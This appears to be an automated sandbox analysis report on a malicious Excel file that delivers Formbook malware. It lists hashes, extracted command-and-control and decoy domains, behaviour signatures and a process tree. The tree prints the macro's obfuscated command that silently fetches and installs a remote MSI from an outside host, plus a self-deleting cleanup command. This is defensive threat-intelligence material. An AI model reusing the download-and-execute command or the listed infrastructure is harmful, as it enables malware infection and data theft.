Analysis
-
max time kernel
150s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
07-05-2021 13:03
Behavioral task
behavioral1
Sample
abc73f63_by_Libranalysis.xls
Resource
win7v20210408
General
-
Target
abc73f63_by_Libranalysis.xls
-
Size
37KB
-
MD5
abc73f6301b9f828dce46943b7111f29
-
SHA1
fadb21a70ab5923cbe8e8deeb36af5e07efd0e87
-
SHA256
ac0ccf59d64faf079e0d4e93ec994865214aefd0899f644da81f8e748e4ee153
-
SHA512
00f1499e6db64cf9bc94bba3a90382f5b045a3e291e65ef8db68a916cf586353d48ac7509c30c14c0da1b1557ac96ba60cf2a5214321395892473634dc56b813
Malware Config
Extracted
formbook
4.1
http://www.craftsman-vail.com/cca/
whenpigsflyhigh.com
artistiklounge.com
tinytrendstique.com
projektpartner-ag.com
charvelevh.com
easycompliances.net
zengheqiye.com
professionalmallorca.com
bonzerstudio.com
nelivo.com
yangxeric.com
aredntech.com
twincitieshousingmarket.com
allshadesunscreen.com
xiang-life.net
qmcp00011.com
lindsayeandmarkv.com
fbcsbvsbvsjbvjs.com
saveonthrivelife.com
newdpo.com
raazjewellers.com
sangsterdesign.com
thedatdaiquiris.com
uljanarattel.com
daebak.cloud
hurricanekickgg.com
mercadilloartisanalfoods.com
salahdinortho.com
thisislandonbraverman.com
siliconesampler.com
youxiaoke.online
trucity.net
mychicpartyboutique.com
adsvestglobal.com
lidoshoreslistings.info
mexicoaprende.online
4-2ararinost.com
kevinberginlbi.com
vaudqa.com
alignedenergetics.info
conmielyconhiel.com
urweddingsite.com
angelshead.com
renejewels.com
sim201.com
fkdjjkdjkrefefe.com
thecontentchicks.com
sarikayalar.net
herspacephilly.com
fortwayneduiattorney.com
vallejocardealers.com
gmworldservice.com
mybuddyryde.net
zeneanyasbyerika.com
downloadhs.com
hernonymous.com
suu6.com
xuehuasa.ltd
miacting.com
thefreedomenvelope.com
yihuisq.net
steamshipautjority.com
lowcarblovefnp.com
knm.xyz
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3388 3976 cmd.exe EXCEL.EXE -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4140-188-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral2/memory/4172-194-0x0000000002E00000-0x0000000002E2E000-memory.dmp formbook behavioral2/memory/4172-196-0x0000000002E30000-0x0000000002F7A000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 22 3076 msiexec.exe -
Executes dropped EXE 2 IoCs
Processes:
MSI5627.tmpMSI5627.tmppid process 2252 MSI5627.tmp 4140 MSI5627.tmp -
Loads dropped DLL 1 IoCs
Processes:
MSI5627.tmppid process 2252 MSI5627.tmp -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 204 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MSI5627.tmpMSI5627.tmpcmd.exedescription pid process target process PID 2252 set thread context of 4140 2252 MSI5627.tmp MSI5627.tmp PID 4140 set thread context of 2764 4140 MSI5627.tmp Explorer.EXE PID 4172 set thread context of 2764 4172 cmd.exe Explorer.EXE -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI5627.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5039.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI548F.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Windows\Installer\MSI5627.tmp nsis_installer_1 C:\Windows\Installer\MSI5627.tmp nsis_installer_2 C:\Windows\Installer\MSI5627.tmp nsis_installer_1 C:\Windows\Installer\MSI5627.tmp nsis_installer_2 C:\Windows\Installer\MSI5627.tmp nsis_installer_1 C:\Windows\Installer\MSI5627.tmp nsis_installer_2 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3976 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 56 IoCs
Processes:
msiexec.exeMSI5627.tmpcmd.exepid process 3076 msiexec.exe 3076 msiexec.exe 4140 MSI5627.tmp 4140 MSI5627.tmp 4140 MSI5627.tmp 4140 MSI5627.tmp 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2764 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
MSI5627.tmpMSI5627.tmpcmd.exepid process 2252 MSI5627.tmp 4140 MSI5627.tmp 4140 MSI5627.tmp 4140 MSI5627.tmp 4172 cmd.exe 4172 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exeMSI5627.tmpcmd.exeExplorer.EXEdescription pid process Token: SeShutdownPrivilege 204 msiexec.exe Token: SeIncreaseQuotaPrivilege 204 msiexec.exe Token: SeSecurityPrivilege 3076 msiexec.exe Token: SeCreateTokenPrivilege 204 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 204 msiexec.exe Token: SeLockMemoryPrivilege 204 msiexec.exe Token: SeIncreaseQuotaPrivilege 204 msiexec.exe Token: SeMachineAccountPrivilege 204 msiexec.exe Token: SeTcbPrivilege 204 msiexec.exe Token: SeSecurityPrivilege 204 msiexec.exe Token: SeTakeOwnershipPrivilege 204 msiexec.exe Token: SeLoadDriverPrivilege 204 msiexec.exe Token: SeSystemProfilePrivilege 204 msiexec.exe Token: SeSystemtimePrivilege 204 msiexec.exe Token: SeProfSingleProcessPrivilege 204 msiexec.exe Token: SeIncBasePriorityPrivilege 204 msiexec.exe Token: SeCreatePagefilePrivilege 204 msiexec.exe Token: SeCreatePermanentPrivilege 204 msiexec.exe Token: SeBackupPrivilege 204 msiexec.exe Token: SeRestorePrivilege 204 msiexec.exe Token: SeShutdownPrivilege 204 msiexec.exe Token: SeDebugPrivilege 204 msiexec.exe Token: SeAuditPrivilege 204 msiexec.exe Token: SeSystemEnvironmentPrivilege 204 msiexec.exe Token: SeChangeNotifyPrivilege 204 msiexec.exe Token: SeRemoteShutdownPrivilege 204 msiexec.exe Token: SeUndockPrivilege 204 msiexec.exe Token: SeSyncAgentPrivilege 204 msiexec.exe Token: SeEnableDelegationPrivilege 204 msiexec.exe Token: SeManageVolumePrivilege 204 msiexec.exe Token: SeImpersonatePrivilege 204 msiexec.exe Token: SeCreateGlobalPrivilege 204 msiexec.exe Token: SeRestorePrivilege 3076 msiexec.exe Token: SeTakeOwnershipPrivilege 3076 msiexec.exe Token: SeRestorePrivilege 3076 msiexec.exe Token: SeTakeOwnershipPrivilege 3076 msiexec.exe Token: SeRestorePrivilege 3076 msiexec.exe Token: SeTakeOwnershipPrivilege 3076 msiexec.exe Token: SeRestorePrivilege 3076 msiexec.exe Token: SeTakeOwnershipPrivilege 3076 msiexec.exe Token: SeRestorePrivilege 3076 msiexec.exe Token: SeTakeOwnershipPrivilege 3076 msiexec.exe Token: SeRestorePrivilege 3076 msiexec.exe Token: SeTakeOwnershipPrivilege 3076 msiexec.exe Token: SeDebugPrivilege 4140 MSI5627.tmp Token: SeDebugPrivilege 4172 cmd.exe Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE Token: SeShutdownPrivilege 2764 Explorer.EXE Token: SeCreatePagefilePrivilege 2764 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 3976 EXCEL.EXE 3976 EXCEL.EXE 3976 EXCEL.EXE 3976 EXCEL.EXE 3976 EXCEL.EXE 3976 EXCEL.EXE 3976 EXCEL.EXE 3976 EXCEL.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 2764 Explorer.EXE -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exeMSI5627.tmpExplorer.EXEcmd.exedescription pid process target process PID 3976 wrote to memory of 3388 3976 EXCEL.EXE cmd.exe PID 3976 wrote to memory of 3388 3976 EXCEL.EXE cmd.exe PID 3388 wrote to memory of 204 3388 cmd.exe msiexec.exe PID 3388 wrote to memory of 204 3388 cmd.exe msiexec.exe PID 3076 wrote to memory of 2252 3076 msiexec.exe MSI5627.tmp PID 3076 wrote to memory of 2252 3076 msiexec.exe MSI5627.tmp PID 3076 wrote to memory of 2252 3076 msiexec.exe MSI5627.tmp PID 2252 wrote to memory of 4140 2252 MSI5627.tmp MSI5627.tmp PID 2252 wrote to memory of 4140 2252 MSI5627.tmp MSI5627.tmp PID 2252 wrote to memory of 4140 2252 MSI5627.tmp MSI5627.tmp PID 2252 wrote to memory of 4140 2252 MSI5627.tmp MSI5627.tmp PID 2764 wrote to memory of 4172 2764 Explorer.EXE cmd.exe PID 2764 wrote to memory of 4172 2764 Explorer.EXE cmd.exe PID 2764 wrote to memory of 4172 2764 Explorer.EXE cmd.exe PID 4172 wrote to memory of 4228 4172 cmd.exe cmd.exe PID 4172 wrote to memory of 4228 4172 cmd.exe cmd.exe PID 4172 wrote to memory of 4228 4172 cmd.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\abc73f63_by_Libranalysis.xls"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/tfv88791.msi /qn3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\msiexec.exemSiExec /i http://farm-finn.com/admin/tfv88791.msi /qn4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Installer\MSI5627.tmp"3⤵PID:4228
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\Installer\MSI5627.tmp"C:\Windows\Installer\MSI5627.tmp"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\Installer\MSI5627.tmp"C:\Windows\Installer\MSI5627.tmp"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
MD5
caccaec6ca54e341eb266b3b98978178
SHA1e02d383072613e1e65a8991adc941b65a82f8be7
SHA25620b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
SHA512838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
MD5
caccaec6ca54e341eb266b3b98978178
SHA1e02d383072613e1e65a8991adc941b65a82f8be7
SHA25620b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
SHA512838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
MD5
caccaec6ca54e341eb266b3b98978178
SHA1e02d383072613e1e65a8991adc941b65a82f8be7
SHA25620b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
SHA512838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
MD5
b8efcf07411a1081f73080bd83f3bf1e
SHA1b534be3372f363f2ae50be8fa8fd94fec8c0dae2
SHA2567faeba7a3e10c3eccd92d119327a0d7e8b0aa99c7ca956326bff1c83ce011440
SHA5123ba6a145c27d62f4d8cfea644945a86d1321e61e0677bae217cc5003f4fad486e56481354f8fd7c46aceea69c6f1824b8efbe17461e319a48940d8b63a53f79c